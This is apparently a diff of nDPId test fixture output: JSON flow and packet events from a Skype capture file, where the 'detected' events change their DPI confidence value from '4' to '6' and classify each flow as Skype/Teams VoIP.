00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":51246,"dst_port":40020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABANxVAAEAGcHTAqAEinTg0LMgunFRemxUUAAAAALAC\/\/+0UAAAAgQFtAEDAwUBAQgKPjHZGQAAAAAEAgAA"} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyDf8AAEARix7AqAEinTeCnDLdnFMAHh0Aex0Cxk3n0hRKPcgDeocb540rNGApyA=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":741,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.156","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1431970655836,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970655836,"pkt":"0NQSxnP1PBXCt3IOCABFAABBoCUAAEAR+GnAqAEiQTffGzLdnF0ALfl1ex8CqPqPm6RB3JLpE4+TALz\/NA1U\/CYbcdFd\/zzgY3E\/zKJhBw=="} 
-00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":742,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655836,"flow_last_seen":1431970655836,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970655836,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.27","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6UqAAAEARkIPAqAEinTc4jjLdnE0AJphseyECmYsgkMQHN\/YIHMBu8w6RdZxUPKbDb+JHSqeN"} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":743,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.142","src_port":13021,"dst_port":40013,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4DEcAAEARVQbAqAEiQAQXmjLdnGAAJHYfeyMC79DK\/hLwI0tI0UYsgGEWGk5hr4E5iC40QQ=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":744,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.154","src_port":13021,"dst_port":40032,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1431970655837,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970655837,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5ayYAAEARfGrAqAEinTg0ITLdnEIAJe9eeyUCb3+11x21V+othQ6FZpV0z1bnAthdPIEc8bI="} 
-00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":745,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970655837,"flow_last_seen":1431970655837,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970655837,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1431970656151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970656151,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGtI2dODQswKgBIpxUyC6j+8V4XpsVFaASOJDYRQAAAgQFrAQCCApMZ\/6WPjHZGQEDAwk="} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1431970656151,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970656151,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0HiFAAEAGiXTAqAEinTg0LMgunFRemxUVo\/vFeYAQECwuNgAAAQEICj4x2lNMZ\/6W"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1wZMAAEARPVPAqAEib91KKjLdnEYAIaXieycCe1fKnMoPyS7sKN+ClU5dh7E8u7Wn6g=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.42","src_port":13021,"dst_port":40006,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3VcEAAEAR2kbAqAEinTfrrDLdnFQAI1TmeykCBTNtXbhMDQf2D6UV0R3mHu30wTeW\/+eg"} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.172","src_port":13021,"dst_port":40020,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAAylicAAEARmerAqAEinTfrpzLdnF0AHsxpeysCNBmO6n4oPt4qGVJFTPBgQCMCbA=="} -00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
+00673{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.167","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+1C4AAEARDvPAqAEinTc4jDLdnEMAKhWUey0Ck6OV07meiCUQoBZZK2TePWK3VEloqo0Om\/LmRrc7qA=="} 
-00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.140","src_port":13021,"dst_port":40003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1431970656861,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970656861,"pkt":"0NQSxnP1PBXCt3IOCABFAABBaS8AAEARxk7AqAEi1ceznDLdnF8ALXpUey8C35QflkiVLuyYHEgftQvOcxrFG1PZDcVv\/V5f70upN2kVjw=="} -00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970656861,"flow_last_seen":1431970656861,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970656861,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.156","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 
